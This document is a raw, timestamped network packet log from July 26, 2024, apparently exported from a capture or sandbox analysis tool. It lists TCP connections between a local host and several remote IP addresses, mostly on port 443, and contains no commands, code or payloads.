Jul 26, 2024 18:56:52.012964010 CEST	443	49759	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:52.013020992 CEST	49759	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:52.014197111 CEST	49759	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:52.014205933 CEST	443	49759	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:52.016529083 CEST	49759	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:52.016534090 CEST	443	49759	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:52.536814928 CEST	443	49760	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:52.536920071 CEST	49760	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:52.543252945 CEST	49760	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:52.543279886 CEST	443	49760	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:52.543683052 CEST	443	49760	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:52.601490021 CEST	49760	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:52.601490021 CEST	49760	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:52.601852894 CEST	443	49760	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:52.823108912 CEST	443	49759	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:52.823189020 CEST	443	49759	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:52.823247910 CEST	49759	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:52.826349020 CEST	49759	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:52.826365948 CEST	443	49759	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:52.832246065 CEST	49761	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:52.832289934 CEST	443	49761	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:52.832359076 CEST	49761	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:52.832899094 CEST	49761	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:52.832916021 CEST	443	49761	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:53.263649940 CEST	443	49760	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:53.263746023 CEST	443	49760	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:53.263811111 CEST	49760	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:53.271678925 CEST	49760	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:53.271711111 CEST	443	49760	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:53.279620886 CEST	49762	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:53.279670954 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:53.279750109 CEST	49762	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:53.280072927 CEST	49762	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:53.280091047 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:53.534672022 CEST	443	49761	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:53.536905050 CEST	49761	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:53.542821884 CEST	49761	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:53.542833090 CEST	443	49761	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:53.544980049 CEST	49761	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:53.544989109 CEST	443	49761	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:53.769829035 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:53.769975901 CEST	49762	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:53.771120071 CEST	49762	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:53.771136045 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:53.771616936 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:53.776473045 CEST	49762	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:53.776501894 CEST	49762	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:53.776571989 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.087091923 CEST	443	49761	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:54.087116003 CEST	443	49761	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:54.087196112 CEST	49761	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:54.087202072 CEST	443	49761	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:54.087243080 CEST	49761	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:54.090001106 CEST	49761	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:54.090023994 CEST	443	49761	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:54.125885010 CEST	49763	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:54.125963926 CEST	443	49763	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:54.129339933 CEST	49763	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:54.138232946 CEST	49763	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:54.138289928 CEST	443	49763	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:54.266863108 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.267054081 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.267088890 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.267117023 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.267162085 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.267174959 CEST	49762	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:54.267219067 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.267240047 CEST	49762	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:54.267333031 CEST	49762	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:54.267648935 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.267771006 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.267812014 CEST	49762	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:54.267819881 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.268363953 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.268414974 CEST	49762	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:54.268423080 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.354264975 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.354317904 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.354366064 CEST	49762	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:54.354386091 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.354425907 CEST	49762	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:54.354832888 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.354907036 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.354952097 CEST	49762	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:54.360234976 CEST	49762	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:54.360254049 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.360269070 CEST	49762	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:54.360275984 CEST	443	49762	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.392736912 CEST	49764	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:54.392761946 CEST	443	49764	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.392817974 CEST	49764	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:54.400387049 CEST	49764	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:54.400405884 CEST	443	49764	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.810718060 CEST	443	49763	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:54.810884953 CEST	49763	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:54.813779116 CEST	49763	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:54.813796997 CEST	443	49763	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:54.816310883 CEST	49763	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:54.816323996 CEST	443	49763	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:54.881638050 CEST	443	49764	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.881709099 CEST	49764	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:54.886564970 CEST	49764	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:54.886576891 CEST	443	49764	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.886837959 CEST	443	49764	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.888398886 CEST	49764	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:54.888583899 CEST	49764	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:54.888602018 CEST	443	49764	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:54.888705015 CEST	49764	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:54.888712883 CEST	443	49764	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:55.374464035 CEST	443	49764	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:55.374665022 CEST	443	49764	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:55.374722004 CEST	49764	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:55.375061035 CEST	49764	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:55.375082016 CEST	443	49764	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:55.388942957 CEST	49765	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:55.389020920 CEST	443	49765	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:55.389100075 CEST	49765	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:55.390449047 CEST	49765	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:55.390482903 CEST	443	49765	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:55.450921059 CEST	443	49763	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:55.450993061 CEST	443	49763	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:55.450994015 CEST	49763	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:55.451042891 CEST	49763	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:55.454710960 CEST	49763	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:55.454751968 CEST	443	49763	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:55.890512943 CEST	443	49765	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:55.890605927 CEST	49765	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:55.897954941 CEST	49765	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:55.897980928 CEST	443	49765	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:55.898205996 CEST	443	49765	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:55.899183989 CEST	49765	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:55.899334908 CEST	49765	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:55.899384022 CEST	443	49765	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:56.222656965 CEST	49766	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:56.222729921 CEST	443	49766	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:56.222803116 CEST	49766	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:56.228517056 CEST	49766	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:56.228549957 CEST	443	49766	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:56.592037916 CEST	443	49765	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:56.592120886 CEST	443	49765	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:56.592269897 CEST	49765	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:56.592459917 CEST	49765	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:56.592514038 CEST	443	49765	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:56.669276953 CEST	49767	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:56.669323921 CEST	443	49767	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:56.669403076 CEST	49767	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:56.669825077 CEST	49767	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:56.669840097 CEST	443	49767	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:56.930507898 CEST	443	49766	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:56.930641890 CEST	49766	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:56.931524038 CEST	49766	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:56.931545019 CEST	443	49766	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:56.933455944 CEST	49766	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:56.933468103 CEST	443	49766	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:56.933521032 CEST	49766	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:56.933553934 CEST	443	49766	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:56.933577061 CEST	49766	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:56.933587074 CEST	443	49766	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:56.933701038 CEST	49766	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:56.933743954 CEST	443	49766	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:56.933759928 CEST	49766	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:56.933773994 CEST	443	49766	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:56.933995008 CEST	49766	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:56.934046030 CEST	443	49766	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:56.934067965 CEST	49766	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:56.934082031 CEST	443	49766	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:56.934236050 CEST	49766	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:56.934269905 CEST	443	49766	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:56.934318066 CEST	49766	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:56.934344053 CEST	443	49766	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:57.175136089 CEST	443	49767	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:57.175235987 CEST	49767	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:57.176574945 CEST	49767	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:57.176604033 CEST	443	49767	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:57.176990032 CEST	443	49767	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:57.178112030 CEST	49767	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:57.178237915 CEST	49767	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:57.178276062 CEST	443	49767	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:57.178337097 CEST	49767	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:57.178345919 CEST	443	49767	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:57.843869925 CEST	443	49767	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:57.843983889 CEST	443	49767	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:57.844245911 CEST	49767	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:57.844595909 CEST	49767	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:57.844618082 CEST	443	49767	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:58.040664911 CEST	49768	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:58.040719986 CEST	443	49768	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:58.040777922 CEST	49768	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:58.041290998 CEST	49768	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:58.041306973 CEST	443	49768	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:58.228425026 CEST	443	49766	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:58.228519917 CEST	443	49766	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:58.228616953 CEST	49766	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:58.228750944 CEST	49766	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:58.228769064 CEST	443	49766	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:58.233119965 CEST	49769	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:58.233154058 CEST	443	49769	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:58.233216047 CEST	49769	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:58.233411074 CEST	49769	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:58.233422995 CEST	443	49769	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:58.693520069 CEST	443	49768	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:58.693630934 CEST	49768	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:58.701515913 CEST	49768	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:58.701531887 CEST	443	49768	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:58.702337980 CEST	443	49768	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:58.703569889 CEST	49768	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:58.703680038 CEST	49768	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:58.703685045 CEST	443	49768	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:58.902534008 CEST	443	49769	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:58.902651072 CEST	49769	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:58.903177023 CEST	49769	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:58.903191090 CEST	443	49769	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:58.904829979 CEST	49769	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:58.904836893 CEST	443	49769	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:59.232021093 CEST	443	49768	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:59.232127905 CEST	443	49768	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:59.232217073 CEST	49768	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:59.232306957 CEST	49768	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:59.232352018 CEST	443	49768	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:59.695348024 CEST	443	49769	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:59.695440054 CEST	443	49769	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:59.695558071 CEST	49769	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:59.695558071 CEST	49769	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:59.707305908 CEST	49769	443	192.168.2.4	5.75.212.60
Jul 26, 2024 18:56:59.707325935 CEST	443	49769	5.75.212.60	192.168.2.4
Jul 26, 2024 18:56:59.726099968 CEST	49770	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:59.726133108 CEST	443	49770	172.67.213.85	192.168.2.4
Jul 26, 2024 18:56:59.726198912 CEST	49770	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:59.726897001 CEST	49770	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:56:59.726912975 CEST	443	49770	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:00.351558924 CEST	443	49770	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:00.351635933 CEST	49770	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:00.376888037 CEST	49770	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:00.376909971 CEST	443	49770	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:00.377110004 CEST	443	49770	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:00.378163099 CEST	49770	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:00.378833055 CEST	49770	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:00.378869057 CEST	443	49770	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:00.378987074 CEST	49770	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:00.379026890 CEST	443	49770	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:00.379141092 CEST	49770	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:00.379180908 CEST	443	49770	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:00.379298925 CEST	49770	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:00.379343033 CEST	443	49770	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:00.379476070 CEST	49770	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:00.379508018 CEST	443	49770	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:00.379663944 CEST	49770	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:00.379698038 CEST	443	49770	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:00.379709005 CEST	49770	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:00.379730940 CEST	443	49770	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:00.379861116 CEST	49770	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:00.379892111 CEST	443	49770	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:00.379918098 CEST	49770	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:00.380040884 CEST	49770	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:00.380078077 CEST	49770	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:00.400356054 CEST	443	49770	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:00.400563955 CEST	49770	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:00.400598049 CEST	443	49770	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:00.400626898 CEST	49770	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:00.400690079 CEST	49770	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:00.405401945 CEST	443	49770	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:02.890681028 CEST	443	49770	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:02.890794992 CEST	443	49770	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:02.890853882 CEST	49770	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:02.890919924 CEST	49770	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:02.890939951 CEST	443	49770	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:02.897394896 CEST	49773	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:02.897439957 CEST	443	49773	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:02.897501945 CEST	49773	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:02.897897005 CEST	49773	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:02.897911072 CEST	443	49773	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:03.549418926 CEST	443	49773	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:03.549500942 CEST	49773	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:03.566899061 CEST	49773	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:03.566929102 CEST	443	49773	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:03.567243099 CEST	443	49773	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:03.568412066 CEST	49773	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:03.568442106 CEST	49773	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:03.568531036 CEST	443	49773	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:04.582353115 CEST	443	49773	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:04.582496881 CEST	443	49773	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:04.582551956 CEST	49773	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:04.582673073 CEST	49773	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:04.582691908 CEST	443	49773	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:04.582703114 CEST	49773	443	192.168.2.4	172.67.213.85
Jul 26, 2024 18:57:04.582707882 CEST	443	49773	172.67.213.85	192.168.2.4
Jul 26, 2024 18:57:14.385025024 CEST	49724	80	192.168.2.4	2.19.126.163
Jul 26, 2024 18:57:14.391726971 CEST	80	49724	2.19.126.163	192.168.2.4
Jul 26, 2024 18:57:14.391812086 CEST	49724	80	192.168.2.4	2.19.126.163
Jul 26, 2024 18:57:23.802683115 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:57:23.908735991 CEST	49780	443	192.168.2.4	149.154.167.99
Jul 26, 2024 18:57:23.908763885 CEST	443	49780	149.154.167.99	192.168.2.4
Jul 26, 2024 18:57:23.908843994 CEST	49780	443	192.168.2.4	149.154.167.99
Jul 26, 2024 18:57:23.911408901 CEST	49780	443	192.168.2.4	149.154.167.99
Jul 26, 2024 18:57:23.911422968 CEST	443	49780	149.154.167.99	192.168.2.4
Jul 26, 2024 18:57:24.610836029 CEST	443	49780	149.154.167.99	192.168.2.4
Jul 26, 2024 18:57:24.611073971 CEST	49780	443	192.168.2.4	149.154.167.99
Jul 26, 2024 18:57:24.658551931 CEST	49780	443	192.168.2.4	149.154.167.99
Jul 26, 2024 18:57:24.658566952 CEST	443	49780	149.154.167.99	192.168.2.4
Jul 26, 2024 18:57:24.658865929 CEST	443	49780	149.154.167.99	192.168.2.4
Jul 26, 2024 18:57:24.658904076 CEST	49780	443	192.168.2.4	149.154.167.99
Jul 26, 2024 18:57:24.659841061 CEST	49780	443	192.168.2.4	149.154.167.99
Jul 26, 2024 18:57:24.704513073 CEST	443	49780	149.154.167.99	192.168.2.4
Jul 26, 2024 18:57:24.892853022 CEST	443	49780	149.154.167.99	192.168.2.4
Jul 26, 2024 18:57:24.892976046 CEST	443	49780	149.154.167.99	192.168.2.4
Jul 26, 2024 18:57:24.893049002 CEST	49780	443	192.168.2.4	149.154.167.99
Jul 26, 2024 18:57:24.893057108 CEST	443	49780	149.154.167.99	192.168.2.4
Jul 26, 2024 18:57:24.893120050 CEST	49780	443	192.168.2.4	149.154.167.99
Jul 26, 2024 18:57:24.893147945 CEST	443	49780	149.154.167.99	192.168.2.4
Jul 26, 2024 18:57:24.893228054 CEST	49780	443	192.168.2.4	149.154.167.99
Jul 26, 2024 18:57:24.897757053 CEST	49780	443	192.168.2.4	149.154.167.99
Jul 26, 2024 18:57:24.897763968 CEST	443	49780	149.154.167.99	192.168.2.4
Jul 26, 2024 18:57:24.907243967 CEST	49781	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:24.907274961 CEST	443	49781	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:24.907459021 CEST	49781	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:24.908166885 CEST	49781	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:24.908179045 CEST	443	49781	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:26.272141933 CEST	443	49781	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:26.272231102 CEST	49781	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:26.279772043 CEST	49781	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:26.279778004 CEST	443	49781	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:26.280256033 CEST	443	49781	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:26.280320883 CEST	49781	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:26.280720949 CEST	49781	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:26.328502893 CEST	443	49781	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:26.809468031 CEST	443	49781	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:26.809655905 CEST	443	49781	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:26.809663057 CEST	49781	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:26.809711933 CEST	49781	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:26.810523033 CEST	49781	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:26.810539961 CEST	443	49781	65.108.151.108	192.168.2.4
Jul 26, 2024 18:57:26.812604904 CEST	49782	443	192.168.2.4	65.108.151.108
Jul 26, 2024 18:57:26.812625885 CEST	443	49782	65.108.151.108	192.168.2.4
